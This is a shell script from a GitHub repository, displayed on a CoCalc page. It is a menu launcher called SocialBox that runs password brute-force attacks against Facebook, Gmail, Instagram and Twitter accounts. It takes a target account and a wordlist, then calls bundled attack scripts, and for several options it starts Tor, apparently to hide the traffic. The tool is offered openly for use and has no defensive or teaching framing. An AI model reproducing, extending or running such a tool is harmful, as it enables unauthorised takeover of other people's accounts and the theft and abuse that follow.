Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
samsesh
GitHub Repository: samsesh/SocialBox-Termux
Path: blob/master/SocialBox.sh
4985 views
1
#!/bin/bash
2
#Colors
3
white="\033[1;37m"
4
grey="\033[0;37m"
5
purple="\033[0;35m"
6
red="\033[1;31m"
7
green="\033[1;32m"
8
yellow="\033[1;33m"
9
Purple="\033[0;35m"
10
Cyan="\033[0;36m"
11
Cafe="\033[0;33m"
12
Fiuscha="\033[0;35m"
13
blue="\033[1;34m"
14
nc="\e[0m"
15
16
echo -e "$red by samsesh.$nc"
17
18
#Installation
19
sleep 1
20
echo -e "Checking Installation $nc"
21
bash install-sb.sh >> /dev/null
22
echo -e "Checking Completed [$green$nc] $nc "
23
sleep 1
24
clear
25
#Startup
26
echo -e "$green"
27
echo " .▄▄ · ▄▄· ▪ ▄▄▄· ▄▄▌ ▄▄▄▄· ▐▄• ▄ "
28
echo " ▐█ ▀. ▪ ▐█ ▌▪██ ▐█ ▀█ ██• ▐█ ▀█▪▪ █▌█▌▪"
29
echo " ▄▀▀▀█▄ ▄█▀▄ ██ ▄▄▐█·▄█▀▀█ ██▪ ▐█▀▀█▄ ▄█▀▄ ·██· "
30
echo " ▐█▄▪▐█▐█▌.▐▌▐███▌▐█▌▐█ ▪▐▌▐█▌▐▌ ██▄▪▐█▐█▌.▐▌▪▐█·█▌"
31
echo -e " ▀▀▀▀ ▀█▄▀▪·▀▀▀ ▀▀▀ ▀ ▀ .▀▀▀ ·▀▀▀▀ ▀█▄▀▪•▀▀ ▀▀$nc $blue v2.beta$nc"
32
#echo -e " [+] $red Coded By sam.sesh$nc [+]"
33
#echo -e " [+] $red samsesh.net $nc [+]"
34
#echo -e " [+] $red Greetz To All Pentesters$nc [+]"
35
#echo -e " [+]$red Special Greetz To$nc :$green {thelinuxchoice , Ha3MrX, Tunisian Eagles, samsesh}$nc [+]"
36
echo ""
37
echo -e "$yellow Select From Menu : $nc"
38
echo ""
39
echo -e " $Cyan 1 : Brute Force Facebook Account$nc"
40
echo -e " $Cyan 2 : Brute Force Gmail Account$nc"
41
echo -e " $Cyan 3 : Brute Force Instagram Account 1$nc"
42
echo -e " $Cyan 4 : Brute Force Twitter Account$nc"
43
echo -e " $Cyan 5 : Brute Force Instagram Account 2 $nc"
44
echo -e " $Cyan 6 : Brute Force Facebook Account 2$nc"
45
echo -e " $Cyan 99: Exit$nc"
46
read -p "Choice > " ch
47
if [ $ch = 1 ]; then
48
echo -e " $Cyan Facebook Brute Force$nc"
49
echo -e "$green"
50
read -p "Enter Facebook ID / Email / Username / Number: " id
51
read -p "Enter wordlist path : " wordlist
52
echo -e "$nc"
53
cd facebook
54
perl fb-brute.pl $id $wordlist
55
echo -e " [+]$yellow Brute Force Complete $nc[$green$nc] $nc[+]"
56
echo -e "$red"
57
read -p "Wanna Back To Main Menu [ Y / n ] : " check
58
echo -e "$nc"
59
if [ $check = "Y" ]; then
60
cd .. && bash SocialBox.sh
61
elif [ $check = "y" ]; then
62
cd .. && bash SocialBox.sh
63
elif [ $check = "Yes" ]; then
64
cd .. && bash SocialBox.sh
65
elif [ $check = "yes" ]; then
66
cd .. && bash SocialBox.sh
67
elif [ $check = "YES" ]; then
68
cd .. && bash SocialBox.sh
69
else
70
exit 1
71
fi
72
elif [ $ch = 2 ]; then
73
echo -e " $Cyan Gmail Brute Force$nc"
74
cd Gemail-Hack
75
python2 gemailhack.py
76
echo -e " [+]$yellow Brute Force Complete $nc[$green$nc] $nc[+]"
77
echo -e "$red"
78
read -p "Wanna Back To Main Menu [ Y / n ] : " check2
79
echo -e "$nc"
80
if [ $check2 = "Y" ]; then
81
cd .. && bash SocialBox.sh
82
elif [ $check2 = "y" ]; then
83
cd .. && bash SocialBox.sh
84
elif [ $check2 = "Yes" ]; then
85
cd .. && bash SocialBox.sh
86
elif [ $check2 = "yes" ]; then
87
cd .. && bash SocialBox.sh
88
elif [ $check2 = "YES" ]; then
89
cd .. && bash SocialBox.sh
90
else
91
exit 1
92
fi
93
elif [ $ch = 3 ]; then
94
echo -e " $Cyan Instagram Brute Force 1$nc"
95
cd instainsane/
96
sleep 0.025
97
echo -e " [+]$red tor $nc[+]"
98
sleep 0.9
99
sv tor start
100
./instainsane.sh
101
echo -e " [+]$yellow Brute Force Complete $nc[$green$nc] $nc[+]"
102
sv tor stop
103
#echo -e " [+]$red Service Tor Stopped$nc [+]"
104
echo -e "$red"
105
read -p "Wanna Back To Main Menu [ Y / n ] : " check3
106
echo -e "$nc"
107
if [ $check3 = "Y" ]; then
108
cd .. && bash SocialBox.sh
109
elif [ $check3 = "y" ]; then
110
cd .. && bash SocialBox.sh
111
elif [ $check3 = "Yes" ]; then
112
cd .. && bash SocialBox.sh
113
elif [ $check3 = "yes" ]; then
114
cd .. && bash SocialBox.sh
115
elif [ $check3 = "YES" ]; then
116
cd .. && bash SocialBox.sh
117
else
118
exit 1
119
fi
120
elif [ $ch = 4 ]; then
121
echo -e " $Cyan Twitter Brute Force$nc"
122
cd tweetshell/
123
sleep 0.025
124
echo -e " [+]$red Service Tor Stated $nc[+]"
125
sleep 0.9
126
sv tor start
127
bash tweetshell.sh
128
echo -e " [+]$yellow Brute Force Complete $nc[$green$nc] $nc[+]"
129
sv tor stop
130
echo -e " [+]$red Service Tor Stopped$nc [+]"
131
echo -e "$red"
132
read -p "Wanna Back To Main Menu [ Y / n ] : " check4
133
echo -e "$nc"
134
if [ $check4 = "Y" ]; then
135
cd .. && bash SocialBox.sh
136
elif [ $check4 = "y" ]; then
137
cd .. && bash SocialBox.sh
138
elif [ $check4 = "Yes" ]; then
139
cd .. && bash SocialBox.sh
140
elif [ $check4 = "yes" ]; then
141
cd .. && bash SocialBox.sh
142
elif [ $check4 = "YES" ]; then
143
cd .. && bash SocialBox.sh
144
else
145
exit 1
146
fi
147
elif [ $ch = 5 ]; then
148
echo -e " $Cyan Instagram Brute Force 2$nc"
149
cd insta-bf/
150
sleep 0.025
151
echo -e " [+]$red Service Tor Started $nc[+]"
152
sleep 0.9
153
sv tor start
154
python instabf.py
155
echo -e " [+]$yellow Brute Force Complete $nc[$green$nc] $nc[+]"
156
sv tor stop
157
echo -e " [+]$red Service Tor Stopped$nc [+]"
158
echo -e "$red"
159
read -p "Wanna Back To Main Menu [ Y / n ] : " check5
160
echo -e "$nc"
161
if [ $check5 = "Y" ]; then
162
cd .. && bash SocialBox.sh
163
elif [ $check5 = "y" ]; then
164
cd .. && bash SocialBox.sh
165
elif [ $check5 = "Yes" ]; then
166
cd .. && bash SocialBox.sh
167
elif [ $check5 = "yes" ]; then
168
cd .. && bash SocialBox.sh
169
elif [ $check5 = "YES" ]; then
170
cd .. && bash SocialBox.sh
171
else
172
exit 1
173
fi
174
elif [ $ch = 6 ]; then
175
echo -e " $Cyan facebook Brute Force 2$nc"
176
cd fikrado.py
177
sleep 0.025
178
echo -e " [+]$red Service Tor Started $nc[+]"
179
sleep 0.9
180
sv tor start
181
python2 fikrado.py
182
echo -e " [+]$yellow Brute Force Complete $nc[$green$nc] $nc[+]"
183
sv tor stop
184
echo -e " [+]$red Service Tor Stopped$nc [+]"
185
echo -e "$red"
186
read -p "Wanna Back To Main Menu [ Y / n ] : " check5
187
echo -e "$nc"
188
if [ $check5 = "Y" ]; then
189
cd .. && bash SocialBox.sh
190
elif [ $check5 = "y" ]; then
191
cd .. && bash SocialBox.sh
192
elif [ $check5 = "Yes" ]; then
193
cd .. && bash SocialBox.sh
194
elif [ $check5 = "yes" ]; then
195
cd .. && bash SocialBox.sh
196
elif [ $check5 = "YES" ]; then
197
cd .. && bash SocialBox.sh
198
else
199
exit 1
200
fi
201
elif [ $ch == 99 ]; then
202
echo -e "$red Program Exit ...$nc"
203
sleep 0.25
204
exit 1
205
else
206
echo "Not Found 404 , Exit"
207
exit 1
208
fi
209
210